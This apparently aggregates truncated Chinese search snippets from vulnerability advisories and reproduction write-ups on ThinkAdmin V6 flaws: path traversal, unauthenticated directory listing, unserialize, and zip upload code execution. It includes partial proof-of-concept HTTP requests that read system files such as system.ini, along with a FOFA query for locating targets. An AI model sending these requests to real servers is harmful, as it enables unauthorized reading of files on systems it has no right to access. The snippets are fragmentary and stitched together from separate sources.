,ThinkAdmin的权限管理基于标准RBAC简化而来,去除了繁杂的节点管理,使得权限管理起来更简单,具体包含节点管理、权限管理、菜单管理、用户管理。 0x01漏洞概述 ThinkAdmin V6版本存在路径遍历漏洞。该漏洞主要是因为api中存在危险函数,且未作任何限制。未作任何认证可以直接调用api中此两危险函数。攻击者可利用该漏洞通过请...
//我读的是windows/system.iniGET /public/index.php?s=admin/api.Update/get/encode/1a1a1b1a1a1b1a1a1b1b3b2x322s333b371b373d37382t311a2x322x HTTP/1.1Host: demo.com User-Agent: Mozilla/5.0(Windows NT10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/125.0.6422.112Safari/537.36A...
ThinkAdmin是一套基于ThinkPHP框架的通用后台管理系统,提供快速二次开发能力,并集成有微信开发组件、支付功能和云存储支持。权限管理简化,便于操作。存在路径遍历漏洞的版本为ThinkAdmin V6,小于等于2020.08.03.01。攻击者通过危险函数可任意读取服务器文件。影响范围具体为版本小于或等于此日期。漏洞编号为...
ThinkAdmin是基于 ThinkPHP 的微信后台管理平台 二、漏洞影响版本 ThinkAdminV6 三、漏洞复现 未授权列目录: POC: POST /admin.html?s=admin/api.Update/node HTTP/1.1Host: xxx.xxx.xxx.xxx User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0Accept: text/html,applic...
ThinkAdmin是一套基于ThinkPHP框架的通用后台管理系统。 ThinkAdmin v6.1.53版本存在安全漏洞,该漏洞源于允许任意文件上传。攻击者可利用该漏洞通过特制的Zip文件执行任意代码。 漏洞公示 在发布漏洞公告信息之前,CNVD都力争保证每条公告的准确性和可靠性。然而,采纳和实施公告中的建议则完全由用户自己决定,其可能引起的问...
一、漏洞简介: ThinkAdmin是一套基于ThinkPHP框架的通用后台管理系统,ThinkAdmin 的权限管理基于标准RBAC简化而来,去除了繁杂的节点管理,使得权限管理起来更简单,具体包含节点管理、权限管理、菜单管理、用户管理。ThinkAdmin 6版本存在路径遍历漏洞。攻击者可利用该漏洞通过GET请求编码参数任意读取远程服务器上的文件。
ThinkAdmin是一套基于ThinkPHP框架的通用后台管理系统,ThinkAdmin 的权限管理基于标准RBAC简化而来,去除了繁杂的节点管理,使得权限管理起来更简单,具体包含节点管理、权限管理、菜单管理、用户管理. ThinkAdmin 6版本存在路径遍历漏洞.攻击者可利用该漏洞通过GET请求编码参数任意读取远程服务器上的文件. ...
ThinkAdmin 是一款基于 ThinkPHP 开发的后台管理开源框架,在码云、github拥有1k+star。 0x02 漏洞详情 issue:https://github.com/zoujingli/ThinkAdmin/issues/238 代码语言:txt AI代码解释 v6 app/admin/controller/api/Update.php line: 46 $this->rules = unserialize($this->request->post('rules', 'a:0...
Thinkadmin小于08.03.01 fofa语句: title="系统登录 · ThinkAdmin" 复现过程: 利用fofa找到几个,看清版本 漏洞位置: /admin.html?s=admin/api.Update/node 参数: rules=["./"] POST /admin.html?s=admin/api.Update/node HTTP/1.1 Host: xxx User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46....
ThinkAdmin是一套基于ThinkPHP5.1框架开发的轻量级后台管理系统,集成了后台系统常用的功能,具有权限管理、文件上传、微信服务等多种模块。 该漏洞与受影响版本中..\application\admin\controller\User.php文件内function pass()函数没有在admin账户修改完密码后对已失效的cookie进行正确处理有关,攻击者可利用该漏洞继续访问...